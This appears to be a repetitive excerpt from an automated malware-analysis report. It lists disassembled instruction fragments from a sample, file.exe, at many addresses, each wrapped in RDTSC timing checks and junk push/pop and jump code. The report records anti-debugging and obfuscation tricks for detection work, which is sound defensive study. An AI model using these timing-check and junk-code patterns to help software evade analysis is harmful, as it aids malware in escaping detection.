Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6084C4 second address: 6084D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F5A147D6A26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608628 second address: 60862E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60862E second address: 608656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F5A147D6A28h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5A147D6A39h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608656 second address: 60865A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6087E5 second address: 6087EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6087EA second address: 6087F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608A6E second address: 608A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608A74 second address: 608A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608A7A second address: 608A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59404A second address: 594078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A14B6C849h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F5A14B6C83Ch 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 594078 second address: 59407E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59407E second address: 59409D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F5A14B6C84Eh 0x0000000b jmp 00007F5A14B6C842h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60C442 second address: 60C463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A147D6A32h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e ja 00007F5A147D6A26h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0144 second address: 5E015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F5A14B6C84Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E02B1 second address: 5E02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E02BB second address: 5E02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E07B6 second address: 5E07BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E07BB second address: 5E07E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jmp 00007F5A14B6C841h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E07E7 second address: 5E07EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E07EB second address: 5E0854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5A14B6C847h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jp 00007F5A14B6C84Dh 0x00000019 jne 00007F5A14B6C84Ch 0x0000001f popad 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0854 second address: 5E085E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5A147D6A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E085E second address: 5E0864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0B71 second address: 5E0B77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0B77 second address: 5E0B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5A14B6C836h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0CAF second address: 5E0CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0CB3 second address: 5E0CBD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5A14B6C836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0CBD second address: 5E0CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1362 second address: 5E1366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1366 second address: 5E13A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5A147D6A39h 0x0000000c jmp 00007F5A147D6A33h 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F5A147D6A37h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E13A7 second address: 5E13AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E13AB second address: 5E13AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E13AF second address: 5E13F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jbe 00007F5A14B6C842h 0x0000000f jmp 00007F5A14B6C83Ch 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F5A14B6C83Eh 0x00000020 jmp 00007F5A14B6C842h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E14C5 second address: 5E1549 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F5A147D6A26h 0x0000000d jmp 00007F5A147D6A34h 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 mov dx, A696h 0x0000001b lea eax, dword ptr [ebp+12484F12h] 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F5A147D6A28h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov ecx, dword ptr [ebp+122D2870h] 0x00000041 jmp 00007F5A147D6A39h 0x00000046 nop 0x00000047 jmp 00007F5A147D6A31h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1549 second address: 5E154D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E154D second address: 5E1553 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60C741 second address: 60C756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5A14B6C836h 0x0000000a pop edi 0x0000000b push esi 0x0000000c js 00007F5A14B6C836h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60C756 second address: 60C780 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5A147D6A3Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60C780 second address: 60C797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5A14B6C836h 0x0000000a popad 0x0000000b jmp 00007F5A14B6C83Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D03B second address: 60D041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D041 second address: 60D055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5A14B6C83Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D1CE second address: 60D1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D1D7 second address: 60D1E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 611FDB second address: 611FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5A147D6A26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 611FE8 second address: 612001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C83Fh 0x00000009 jnc 00007F5A14B6C836h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 612001 second address: 61201D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5A147D6A30h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61256F second address: 612575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 612575 second address: 61257D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6126D1 second address: 6126D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6126D5 second address: 6126DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 612F52 second address: 612F6B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5A14B6C836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F5A14B6C83Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 612F6B second address: 612F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A147D6A39h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5A147D6A34h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6179F8 second address: 6179FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6179FC second address: 617A08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 617A08 second address: 617A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 617A0C second address: 617A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 617C8A second address: 617CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F5A14B6C83Fh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5A14B6C83Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 617CB6 second address: 617CC0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5A147D6A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 617E79 second address: 617EC9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007F5A14B6C84Dh 0x00000011 ja 00007F5A14B6C853h 0x00000017 jmp 00007F5A14B6C847h 0x0000001c jnl 00007F5A14B6C836h 0x00000022 push eax 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618451 second address: 618476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5A147D6A35h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618476 second address: 61847F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618774 second address: 6187B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5A147D6A26h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F5A147D6A32h 0x00000014 pop eax 0x00000015 push edi 0x00000016 jmp 00007F5A147D6A2Ah 0x0000001b jmp 00007F5A147D6A30h 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618EB5 second address: 618EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5A14B6C83Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618EC8 second address: 618ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E1E7 second address: 59E1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F5A14B6C836h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59E1F6 second address: 59E1FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62041B second address: 62041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62041F second address: 620429 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5A147D6A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 620429 second address: 620433 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5A14B6C83Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624888 second address: 624892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624892 second address: 624896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624A13 second address: 624A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624A19 second address: 624A27 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5A14B6C836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 627714 second address: 627718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 627B9B second address: 627BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5A14B6C846h 0x0000000b popad 0x0000000c pushad 0x0000000d ja 00007F5A14B6C836h 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007F5A14B6C836h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CAB3 second address: 62CABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62CABA second address: 62CAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C83Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62BFAA second address: 62BFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5A147D6A26h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F5A147D6A31h 0x00000011 pop eax 0x00000012 push esi 0x00000013 jc 00007F5A147D6A26h 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62BFD6 second address: 62BFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62BFDA second address: 62BFE4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5A147D6A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62C2E1 second address: 62C2E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62C2E6 second address: 62C2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 632953 second address: 632969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A14B6C83Bh 0x00000007 push edx 0x00000008 jne 00007F5A14B6C836h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 632969 second address: 63298A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F5A147D6A2Ch 0x0000000f jp 00007F5A147D6A26h 0x00000015 jc 00007F5A147D6A2Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63298A second address: 6329A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A14B6C83Ch 0x00000009 jnp 00007F5A14B6C836h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631136 second address: 63113A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63113A second address: 631148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631148 second address: 631178 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5A147D6A3Fh 0x00000008 push ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F5A147D6A26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 631178 second address: 63117C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6312D8 second address: 6312F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F5A147D6A33h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6315AF second address: 6315B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6315B3 second address: 6315C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6315C1 second address: 6315C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6315C5 second address: 6315DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5A147D6A2Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6315DA second address: 6315DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
